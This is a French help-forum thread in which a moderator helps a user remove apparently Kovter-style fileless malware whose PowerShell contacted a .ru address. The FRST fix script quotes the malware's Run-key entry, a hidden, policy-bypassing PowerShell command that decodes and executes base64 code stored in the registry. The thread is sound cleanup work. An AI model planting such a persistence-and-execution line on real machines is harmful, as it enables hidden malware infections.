Sujet Précédent Sujet Suivant

Activité Suspecte et URL:MAL de Powershell.exe

Résolu/Fermé
thisismypic Messages postés 12 Date d'inscription mercredi 6 janvier 2016 Statut Membre Dernière intervention 20 octobre 2016 - Modifié par Malekal_morte- le 13/04/2016 à 16:01
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 21 avril 2016 à 08:42
Bonjour,
Depuis quelques temps j'ai constaté une petite tache de powershell.exe qui s'affiche pendant le demarrage .
Et maintenant chaque fois que je demarre mon pc , apres un certain temps , une fenetre de avast free antivirus me dit que powershell communique avec une adresse .ru (en tout cas c'est ce que j'ai compris ) .



est ce que c'est une menace ? est ce que c'est le vrai service powershell de microsoft ? et qu'est ce que je dois faire . MERCI


5 réponses

Réponse 1 / 5
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 661
Modifié par Malekal_morte- le 12/04/2016 à 23:43
Salut,

Surement un Malware fileless style Kovter,

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


Veuillez appuyer sur une touche pour continuer la désinfection...
3
thisismypic Messages postés 12 Date d'inscription mercredi 6 janvier 2016 Statut Membre Dernière intervention 20 octobre 2016
13 avril 2016 à 15:57
Salut,

Rapport envoyés par PM

Merci
0
Réponse 2 / 5
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 661
Modifié par Malekal_morte- le 13/04/2016 à 16:26
Je confirme malware fileless,

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit : 


CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-3494909506-307055643-2725329465-1000\...\Run: [{B8C5EA85-D80F-4CCD-919B-68EE51714F36}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\HHHKGBTOELADSHK').LqRjlGAV))); 
reg: reg delete "HKEY_CURRENT_USER\Software\Classes\HHHKGBTOELADSHK""
Reboot:

Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

Refais un scan FRST et donne les nouveaux rapports via pjjoint.

Veuillez appuyer sur une touche pour continuer la désinfection...
1
thisismypic Messages postés 12 Date d'inscription mercredi 6 janvier 2016 Statut Membre Dernière intervention 20 octobre 2016
Modifié par thisismypic le 13/04/2016 à 16:25
rapports envoyés .
merci
0
Réponse 3 / 5
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 661
13 avril 2016 à 16:25
vois si les alertes s'arretent.
1
thisismypic Messages postés 12 Date d'inscription mercredi 6 janvier 2016 Statut Membre Dernière intervention 20 octobre 2016
13 avril 2016 à 16:27
D'accord .
Je dois utiliser mon pc pour un certain temps pour voir si les alertes s'arretent.
merci.
0
thisismypic Messages postés 12 Date d'inscription mercredi 6 janvier 2016 Statut Membre Dernière intervention 20 octobre 2016
20 avril 2016 à 20:12
Salut,

Les alertent sont disparus . Cela veut dire que mon pc est complètement nettoyé ?
0
Réponse 4 / 5
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 661
Modifié par Malekal_morte- le 20/04/2016 à 20:15
il ya des chances, refais un scan FRST et donne les rapports via pjjoint pour confirmer


Veuillez appuyer sur une touche pour continuer la désinfection...
1
thisismypic Messages postés 12 Date d'inscription mercredi 6 janvier 2016 Statut Membre Dernière intervention 20 octobre 2016
20 avril 2016 à 20:34
Salut ,
les resultats sont envoyés par message .
merci
0
thisismypic Messages postés 12 Date d'inscription mercredi 6 janvier 2016 Statut Membre Dernière intervention 20 octobre 2016
20 avril 2016 à 20:37
SVP , veuillez verifer si il y a des menaces autres que powershell .
Merci beaucoup .
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 5
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 661
21 avril 2016 à 08:42
ça me paraît good =)


Quelques conseils :

Comment se protéger des scripts malicieux sur Windows

Renforce la sécurité de ton Windows : Comment sécuriser mon Windows


1

Discussions similaires

Sécurité de l'URL
ghaouar -
fiddy -

2 réponses
Indicateur d’activité sur Snapchat
Dominique -
Dominique -

0 réponse
Compte Amazon bloqué pour activité inhabituelle
Pierre_Ubk -
Pierre -

8 réponses
Compte Orange bloqué
Arthur-92 -
MPMP10 -

4 réponses
La nouvelle messagerie du Boncoin....
Utilisateur anonyme -
Madabatro -

69 réponses